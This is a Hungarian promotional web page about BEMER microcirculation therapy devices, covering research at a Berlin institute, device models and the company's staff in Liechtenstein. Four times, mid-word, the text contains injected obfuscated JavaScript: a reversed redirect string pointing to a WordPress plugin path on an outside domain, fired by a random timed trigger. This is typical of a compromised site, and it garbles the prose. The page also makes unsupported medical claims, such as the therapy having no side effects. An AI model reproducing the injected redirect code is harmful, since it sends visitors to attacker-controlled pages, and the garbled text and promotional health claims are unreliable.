A BEMER technológia történetében a kettős vakpróbás tanulmányok igazolták a termék hatékonyságát, de az eredmények mögött sok magyarázat hiányzott. Prof. Dr. Klopp azonban láthatóvá is tette mi történik az emberi szervezetben a BEMER kezelés hatására. Így kezdődött a BEMER kutatás.

 

BEMER 3000
A berlini Mikrocirkulációs Intézetben intenzíven kezdték el vizsgálni a BEMER hatását. Fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos volt minden útkereszteződésnél meghatározni a helyes irányt, hogy a kutatások ne zsákutcába vezessenek. Ahhoz, hogy egy korszakos gyógyászati innováció szülessen, minden apró részletre oda kellett figyelni. A kutatás folyamán olyan csúcstechnológiájú eszközöket használtak és használnak, ami technikai oldalról maximálisan segíti a tudósok munkáját. Ilyen eszközök például a nagysebességű kamerához csatlakoztatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott intravital-mikroszkóppal vagy a reflexió-spektrométeres mérési eljárások. Ezen módszertan és eszközök alkalmazásával sikerült egyértelműsíteni és láthatóvá tenni mi is történik a BEMER hatására az emberi testben.

 

A fentebb jelzett eszközök használata lehetővé tették az egyértelmű tudományos bizonyítás módszertanát és gyakorlatban való megvalósítását. A jelfolyamok hosszú ideig való tesztelésével, amely a BEMER impulzusforma feltalálási időpontjától, azaz 1998-tól 2010 – ig tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, egy merőben új többféle alkalmazást lehetővé tevő jelösszetétel született. Az új termék, amely több innovatív megoldást alkalmazó hardver eszközökben (BEMER Classic, BEMER Professional) valósult meg. az előző impulzusformáktól merőben új modulációval rendelkező jelfolyam lett. Pit Gleim a BEMER egyik vezérigazgatója szerint „az igazi erő nem az izmokból fakad. A döntő a vasakaratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tod, ami kitartóbban dolgozik bárki másnál.”

 

Mi a BEMER munkatársai és befektetői nagy erőfeszítéseket teszünk, hogy a kutatás –fejlesztés a megfelelő ütemben tudjon haladni és a kor egészség megőrzési és más egészségügyi kihívásának megfelelő választ adhasson. Mi a BEMER közösség tagjai a tudományos munka mellett fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosnak tartjuk, hogy egyre többen ismerjék meg ezt a modern, mellékhatásoktól mentes technológiát hazánkban és világszerte. A lichtenstein-i Triesen városban a munkatársak népes csapata foglalkozik a gyártással, a logisztikával, a szervizzel, az ügyfelekkel, a gyógyászati kutatásokkal, az értékesítéssel, a marketinggel és a vállalati kommunikációval. Ez a szervezet segíti, hogy európai és világszinten több ezer üzletpartner megfelelő szinten ki legyen szolgálva és üzletpartnereink lelkiismeretes feladatvégzése segítse az orvosok, egészségügyi személyzet munkáját és a betegek gyógyulását.